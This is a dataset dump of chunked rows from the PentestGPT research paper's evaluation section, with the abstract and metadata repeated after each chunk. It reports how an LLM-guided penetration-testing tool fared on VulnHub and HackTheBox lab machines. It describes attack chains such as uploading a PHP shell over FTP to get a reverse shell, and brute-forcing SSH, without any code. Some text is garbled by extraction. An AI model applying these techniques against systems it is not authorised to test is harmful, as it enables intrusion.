proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 59 | # 6. Evaluation
In this section, we assess the performance of PENTESTGPT, focusing on the following four research questions: RQ3 (Performance): How does the performance of PEN- TESTGPT compare with that of native LLM models and human experts? RQ4 (Strategy): Does PENTESTGPT employ different problem-solving strategies compared to those utilized by LLMs or human experts? RQ5 (Ablation): How does each module within PENTEST- GPT contribute to the overall penetration testing perfor- mance? RQ6 (Practicality): Is PENTESTGPT practical and effective in real-world penetration testing tasks?
# 6.1. Evaluation Settings | 2308.06782#59 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 60 | # 6.1. Evaluation Settings
We implement PENTESTGPT with 1,700 lines of Python3 code and 740 prompts, available at our anonymized project website [18]. We evaluate its performance over the benchmark constructed in Section 3. In this evaluation, we integrate PENTESTGPT with GPT-3.5 and GPT-4 to form two working versions: PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4. Due to the lack of API access, we do not select other LLM models, such as Bard. In line with our previous experiments, we use the same experiment environment setting and instruct PENTESTGPT to only use the non-automated penetration testing tools.
12
# 6.2. Performance Evaluation (RQ3) | 2308.06782#60 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 61 | 12
# 6.2. Performance Evaluation (RQ3)
The overall task completion status of PENTESTGPT- GPT-3.5, PENTESTGPT-GPT-4, and the naive usage of LLMs is illustrated in Figure 6a. As the Figure shows, our solutions powered by LLMs demonstrate superior penetra- tion testing capabilities compared to the naive application of LLMs. Specifically, PENTESTGPT-GPT-4 surpasses the other three solutions, successfully solving 6 out of 7 easy difficulty targets and 2 out of 4 medium difficulty targets. This performance indicates that PENTESTGPT-GPT-4 can handle penetration testing targets ranging from easy to medium difficulty levels. Meanwhile, PENTESTGPT-GPT- 3.5 manages to solve only two challenges of easy difficulty, a discrepancy that can be attributed to GPT-3.5 lacking the knowledge related to penetration testing found in GPT-4. | 2308.06782#61 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 62 | The sub-task completion status of PENTESTGPT-GPT- 3.5, PENTESTGPT-GPT-4, and the naive usage of LLM is shown in Figure 6b. As the Figure illustrates, both PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4 per- form better than the standard utilization of LLMs. It is noteworthy that PENTESTGPT-GPT-4 not only solves one more medium difficulty target compared to naive GPT-4 but also accomplishes 111% more sub-tasks (57 vs. 27). This highlights that our design effectively addresses context loss challenges and leads to more promising testing results. Nevertheless, all the solutions struggle with hard difficulty testing targets. As elaborated in Section 4, hard difficulty targets typically demand a deep understanding from the penetration tester. To reach testing objectives, they may require modifications to existing penetration testing tools or scripts. Our design does not expand the LLMsâ knowledge of vulnerabilities, so it does not notably enhance perfor- mance on these more complex targets.
# 6.3. Strategy Evaluation (RQ4) | 2308.06782#62 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 63 | # 6.3. Strategy Evaluation (RQ4)
We then investigate the problem-solving strategies em- ployed by PENTESTGPT, contrasting them with those of LLMs and human experts. By manually analyzing the pen- etration testing process of PENTESTGPT, we synthesize its underlying approaches to problem-solving. We surprisingly find that PENTESTGPT decomposes the penetration test- ing task in a manner akin to human experts, successfully achieving the overall goal. Instead of focusing solely on the most recently discovered task, PENTESTGPT can pinpoint potential sub-tasks likely to lead to successful outcomes.
Figure 7 provides an illustrative example, demonstrating the strategic differences between GPT-4 and PENTESTGPT while handling the VulnHub machine, Hackable II [47]. This target comprises two vulnerable services: an FTP service allowing arbitrary file uploads and a web service enabling file viewing through FTP. A successful exploit necessitates exploiting both services by uploading a malicious PHP through the shell via the FTP service and triggering it web service. As depicted in the figure, GPT-4 begins by enumerating the FTP service and successfully identifies the file upload vulnerability (â¶-â¸). However, it fails to correlate | 2308.06782#63 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 65 | (b) Subtask completion status.
Figure 6: The PENTESTGPT-GPT-3.5, on overall target completion and sub-task completion.
this with the web service, resulting in an incomplete exploit in the following steps. Conversely, PENTESTGPT follows a more holistic approach, toggling between enumerating the FTP service and browsing the web service. In particular, PENTESTGPT firstly â¶ enumerates the FTP service and â· web service to understand the general situation. It then ⸠prioritizes the FTP service, and â¹ eventually discovers the file upload vulnerability. More importantly, in this process, PENTESTGPT identifies that files available on FTP are the same as those on the web service. By connecting these findings, PENTESTGPT guides the tester to ⺠perform a shell upload, â» leading to a successful reverse shell. This strategy aligns with the walkthrough solution and highlights PENTESTGPTâs comprehensive understanding of the pene- tration testing process and its ability to make effective de- cisions on the optimal sub-task to pursue next. This reveals PENTESTGPTâs strategic thinking and ability to integrate different aspects of the testing process. | 2308.06782#65 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 66 | Our second observation is that although PENTESTGPT behaves more similarly to human experts, it still exhibits some strategies that humans will not apply. For instance, PENTESTGPT still prioritizes brute-force attacks before vul- nerability scanning. This is obvious in cases where PEN- TESTGPT always tries to brute-force the SSH service on target machines.
We then analyze the failed penetration testing cases to understand the limitations of PENTESTGPT. Beyond the absence of some advanced penetration testing techniques, two primary issues emerge. First, PENTESTGPT struggles
13
GPT-4 Port Scanning FIP) | Service PentestGPT t ! 1 ' ] q 1 1 I q 1 1 I q 1 1 fl i if file); '( Web 1 File | Browsing q 1{ Scanning i Browsing 1 3 1 1 q i} 1 fi q 1 I q 1 fi q t 1 I q 1) Flow2 | 1 q 1 Flow 1 & 2 are Independent Flow 1 & 2 are Interrelated
# f) f)
Figure 7: Penetration testing strategy comparison between GPT-3.5 and PENTESTGPT on VulnHub-Hackable II. | 2308.06782#66 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 67 | # f) f)
Figure 7: Penetration testing strategy comparison between GPT-3.5 and PENTESTGPT on VulnHub-Hackable II.
to interpret images. LLMs are limited to text comprehension, so they cannot accurately process images. This issue might be addressed by developing large multimodal models to un- derstand text and visual data. Second, it cannot grasp certain social engineering tricks and subtle cues. For instance, real- world penetration testers often create brute-force wordlists using information gathered from the target service. Though PENTESTGPT can retrieve a list of names from a web service, it fails to instruct the use of tools to create a wordlist from those names. These limitations underline the necessity for improvement in areas where human insight and intricate reasoning are still more proficient than automated solutions.
# 6.4. Ablation Study (RQ5)
We perform an ablation study on how the three mod- ules: Reasoning Module, Generation Module, and Parsing Module, contribute to the performance of PENTESTGPT. We implement three variants:
the Parsing Module is deactivated, causing all data to be directly fed into the system. | 2308.06782#67 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 68 | the Parsing Module is deactivated, causing all data to be directly fed into the system.
the Generation Module is deactivated, leading to the completion of task generation within the Reasoning Module itself. The prompts for task generation remain consistent. 3) PENTESTGPT-NO-REASONING: the Reasoning Mod- ule is desabled. Instead of PTT, this variant adopts the same methodology utilized with LLMs for penetration testing, as delineated in the Exploratory Study.
All the variants are integrated with GPT-4 API for testing. The results of the three variants tested on our pen- etration testing benchmarks are depicted in Figure 8. In general, PENTESTGPT demonstrates superiority over the three ablation baselines regarding overall target and sub-task completion. Our key findings are as follows: (1) In the ab- sence of the Parsing Module, PENTESTGPT-NO-PARSING attains marginally lower performance in overall task and sub-task completion relative to the full configuration. While parsing information is advantageous in penetration testing,
âââ PentestGPT-no-Generation ââ PentestGPT â PentestGPT-no-Parsing ââ PentestGPT-no-Reasoning 2 1 1 BB. o o o oOo Medium Hard Easy
(a) Overall completion status | 2308.06782#68 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 70 | the 32k token size limit often suffices for various outputs. Given the Reasoning Moduleâs inherent design to maintain the entire testing context, the lack of the Parsing Module does not substantially impair the toolâs performance. (2) PENTESTGPT-NO-REASONING fares the worst, completing only 53.6% of the sub-tasks achieved by the full solution, an outcome even inferior to the naive application of GPT- 4 in testing. We attribute this to the Generation Module adding supplementary sub-tasks to the LLM context. Since the prompts are not tailored for scenarios without the Rea- soning Module, the resulting outputs are irrelevant for the naive LLM without the Generation Module. Furthermore, the extended generation output obscures the original context, hindering the LLMâs ability to concentrate on the task, thus failing the test. (3) PENTESTGPT-NO-GENERATION realizes performance slightly above that of GPT-4 em- ployed naively. This occurs because, without the Generation Module, the testing procedure closely resembles the usage of LLMs. Notably, the Generation Module is principally intended to guide the tester in executing precise penetration the tester may testing operations. Without depend on supplementary information to operate the tools or scripts essential for completing the test.
# 6.5. Practicality Study (RQ6) | 2308.06782#70 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 71 | # 6.5. Practicality Study (RQ6)
We demonstrate that PENTESTGPT exhibits practicality for real-world penetration testing beyond the crafted bench- mark. For this purpose, we engage PENTESTGPT in the
14
TABLE 5: PENTESTGPT performance over the active Hack- TheBox Challenges.
Machine Sau Pilgramage Topology PC MonitorsTwo Authority Sandworm Jupiter Agile OnlyForYou Total Difficulty Easy Easy Easy Easy Easy Medium Medium Medium Medium Medium - Completion â â â â â â â â â â 6 Completed Users 4798 5474 4500 6061 8684 1209 2106 1494 4395 2296 - Cost (USD) 15.2 12.6 8.3 16.1 9.2 11.5 10.2 6.6 22.5 19.3 131.5 | 2308.06782#71 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 72 | HackTheBox active machine challenges, a series of penetra- tion testing objectives open to global testers. Each challenge consists of two components: a user flag, retrievable upon initial user access, and a root flag, obtainable after gaining root access. Our evaluation encompasses five targets of easy difficulty and five of medium difficulty. During this exercise, PENTESTGPT, utilizing GPT-4âs 32k token API, conducts up to five tests on each target. Success is defined solely by the capture of the root flag. Table 5 details the performance of PENTESTGPT in these challenges3. Ultimately, PEN- TESTGPT completes three easy and five medium challenges. The total expenditure for this exercise amounts to 131.5 USD, averaging 21.92 USD per target. This cost is markedly lower than employing human penetration testers and falls within an acceptable range. Our evaluation, therefore, under- scores PENTESTGPTâs capability to yield viable penetration testing results in real-world settings at an efficient cost, thereby highlighting its potential as a practical tool in the cybersecurity domain.
# 7. Discussion | 2308.06782#72 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 73 | # 7. Discussion
